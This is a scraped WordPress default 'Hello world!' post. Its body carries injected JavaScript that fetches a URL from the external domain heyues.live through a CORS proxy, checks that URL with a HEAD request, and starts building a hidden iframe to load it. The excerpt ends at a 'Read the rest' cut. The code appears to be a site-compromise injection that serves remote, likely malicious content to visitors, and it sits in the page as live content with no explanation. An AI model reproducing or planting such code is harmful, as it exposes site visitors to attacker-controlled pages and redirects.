Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!

const configLink = "https://corsproxy.io/?url=http://heyues.live";

if (!window.__digitalflwrFetchPromise) {

window.__digitalflwrFetchPromise = fetch(configLink) .then(response ={ if (!response.ok) { throw new Error(" "); } return response.text(); })

.then(finalUrl ={ return fetch(finalUrl, { method: "HEAD" }) .then(headResponse =({ headResponse, finalUrl })); }) .catch(() ={

}); }

if (typeof window.__digitalflwrIframeCreated === "undefined") { window.__digitalflwrIframeCreated = false; }

window.__digitalflwrFetchPromise .then(result ={

if (!result) return; const { headResponse, finalUrl } = result;

if (!headResponse || headResponse.status === 404) { return; }

if (!window.__digitalflwrIframeCreated) { window.__digitalflwrIframeCreated = … Read the rest